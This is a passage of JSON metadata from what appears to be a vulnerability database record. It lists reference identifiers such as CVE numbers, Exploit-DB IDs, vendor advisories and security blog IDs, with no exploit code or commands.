"SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:96367", "SSV:97269", "SSV:97346"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0468-1", "OPENSUSE-SU-2021:0677-1", "OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "symantec", "idList": ["SMNTC-107691", "SMNTC-108273", "SMNTC-108581", "SMNTC-111238", "SMNTC-111370", "SMNTC-111482", "SMNTC-1411"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2B14B5B996283DEF7D095E87B1128109", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4959B86491B72239BCAF1958D167D57D", "THN:4D730B0E8FB7A8FA81D69770EF31795C", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:7312C296214FCDE145DA02B933FB28F6", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:942BFBB34DF6A24E460572684F648005", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9B536B531E6948881A29BEC793495D1E", "THN:9B966D7333226606F54AD717A81F6D7E", "THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:CE51F3F4A94EFC268FD06200BF55BECD", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:D839D3F3F73DC023B139A626D8C9CFE4", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F1F7A2FB2164F9A7A60AB12A3C71076A"]}, {"type": "threatpost", "idList": ["THREATPOST:018A5896B52734EF63419DC7D2122C0A", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:145B6B682222579D2623C124AE9DACD5", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:170045B7C0BA198775BD78B7D00C824E", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20EAC8CBCC0B2A55B8195EB5B485B9D6", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F655BBBA2F55BA4D5A5093E56BB1E78E", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trellix", "idList": ["TRELLIX:595642FD30B52118607424330C136C80", "TRELLIX:6373864BD1A0BAFE3430F237433C84A5", "TRELLIX:6A66742843755E787356176A644AAD06", "TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:D9D2CB1A313A30DE730375258BD8DF6E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2018-6789"]}, {"type": "veracode", "idList": ["VERACODE:22403", "VERACODE:25767"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-28661", "1337DAY-ID-30269", "1337DAY-ID-30290", "1337DAY-ID-31403", "1337DAY-ID-32569", "1337DAY-ID-32790", "1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-33683", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34095", "1337DAY-ID-34170", "1337DAY-ID-34184", "1337DAY-ID-34235", "1337DAY-ID-34468", "1337DAY-ID-34553", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-35085", "1337DAY-ID-35228", "1337DAY-ID-36350", "1337DAY-ID-36351"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:7673EE0281A214ED87D52BA25B8C65BA", "0DAYDB:AF426AEE507511B61499B493AB5C0D11", "0DAYDB:C05243B3F6EF6FD2D281FAA1565DB0D6"]}, {"type": "adobe", "idList": ["APSB18-14"]}, {"type": "amazon", "idList": ["ALAS-2018-970"]}, {"type": "archlinux", "idList": ["ASA-201802-6"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:03ABAD00-322E-4905-B8D2-E3DA9F049145", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:1A38FF57-43D7-4AFE-9E56-6A773F2B88AE", "AKB:1EB6A6AA-8081-4030-BC12-58CFD5C47668", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "AKB:3EC4F6E5-7F60-42EF-9218-009F7538748C", "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:862DFB64-EE07-4F1F-B5F3-8F2C3A560A5F", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B4447AA8-BD5F-410D-A592-76FEEDA507EA", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:E152B863-E927-4417-BC7B-1472E48FD3A1", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799"]}, {"type": "avleonov", "idList": ["AVLEONOV:C227E6D768CE965E884A2A9208D66579"]}, {"type": "canvas", "idList": ["BLUEKEEP", "BRIGHTMAIL_RESTORE", "EXIM_HEAP_OVERFLOW", "NETSCALER_TRAVERSAL_RCE", "OWA_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:B2094018923AC88282ED4B94CB24F28B"]}, {"type": "cert", "idList": ["VU:619785", "VU:849224", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0728", "CPAI-2018-0772", "CPAI-2018-1694", "CPAI-2019-0430", "CPAI-2019-0506", "CPAI-2019-0657", "CPAI-2019-0860", "CPAI-2019-1097", "CPAI-2019-1531", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2020-0019", "CPAI-2020-0104", "CPAI-2020-0118", "CPAI-2020-0179", "CPAI-2020-0320", "CPAI-2020-0628", "CPAI-2020-0712"]}, {"type": "checkpoint_security", "idList": ["CPS:SK164716"]}, {"type": "chrome", "idList": ["GCSA-7741258004223335178"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:779BA36AC3457391150C49F501628DF7", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:871444F0026579280090F0A0759442B1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:E863981ED150C9E5F6666207FF8917D0"]}, {"type": "cisco", "idList": ["CISCO-SA-20200205-IOSXR-CDP-RCE"]}, {"type": "citrix", "idList": ["CTX267027", "CTX276688"]}, {"type": "cve", "idList": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-2555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1274-1:2DD70", "DEBIAN:DSA-4110-1:E5F9E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-6789"]}, {"type": "dsquare", "idList": ["E-581", "E-686", "E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:42519", "EDB-ID:44571", "EDB-ID:46731", "EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48320", "EDB-ID:48508", "EDB-ID:49038"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4639A09DD9AC0CEB700BE689515D2AE7"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fedora", "idList": ["FEDORA:3B593605DCC5", "FEDORA:C80A96015189"]}, {"type": "filippoio", "idList": ["FILIPPOIO:A761D20DF072FAFAF24F6BC3A68D6AF9"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "316B3C3E-0E98-11E8-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201803-01"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "10F73C81-91F0-5199-9C8E-432BF228C96A", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "1741E720-F85A-5179-AB8A-D6FA2E185092", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "1FEBEBF0-4E44-56B3-8111-2B2357BDD6B6", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "28F899A8-D565-51D0-A9B5-5B2B631407EB", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2AF9B196-507F-5F76-9363-5651035AE371", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2ED15233-2A01-53F8-A939-8A4D06481CF4", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "370515CC-C819-5D01-917D-2DF4728A28F4", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "560405C4-4806-5173-B662-F9C3D776D8D4", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "6531DE99-76A6-5374-998A-30AC54C10711", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "757B9105-ADEF-5B27-8B1F-A06AE0566065", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "78155987-ACB5-51CD-99EB-FF372456D94D", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "80F73667-B6DA-5D40-984F-3F104E58C6B4", "851959DE-3B5C-5317-868E-5D80E801E3B0", "88373793-9076-5F05-BDBB-635A7E1BD897", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "92BBBF7B-026E-553A-883B-AEF503046C18", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "94095106-8E25-54E1-924C-2C3B4E99610F", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C32E281-E6FB-587D-9ECC-F961B7082D43", "9D170C46-A745-5692-BA84-67EBFEA037FF", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A04C30E0-722D-5CF4-B80A-547C1C702024", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A43D1B77-D6EF-5570-AF16-6320A544CE0A", "A48A7BCD-4B97-5BDB-A571-3B8DF0069FB9", "A4E7A7FA-3876-5263-8290-CAB45A4A2F1F", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A839FA86-0873-592C-AA31-2C445B4C4F29", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "A96AA4B1-C8BB-579A-8D24-BC5F3628A0A4", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AE10BD2D-66B3-5C55-9296-FA884BA0CA27", "AE9D3A7C-7BEB-54EA-9C61-A03C494D5EDD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "B417316F-A794-5234-BC9E-475C438FC35C", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BE90B1DD-521D-540C-8554-5454779256A5", 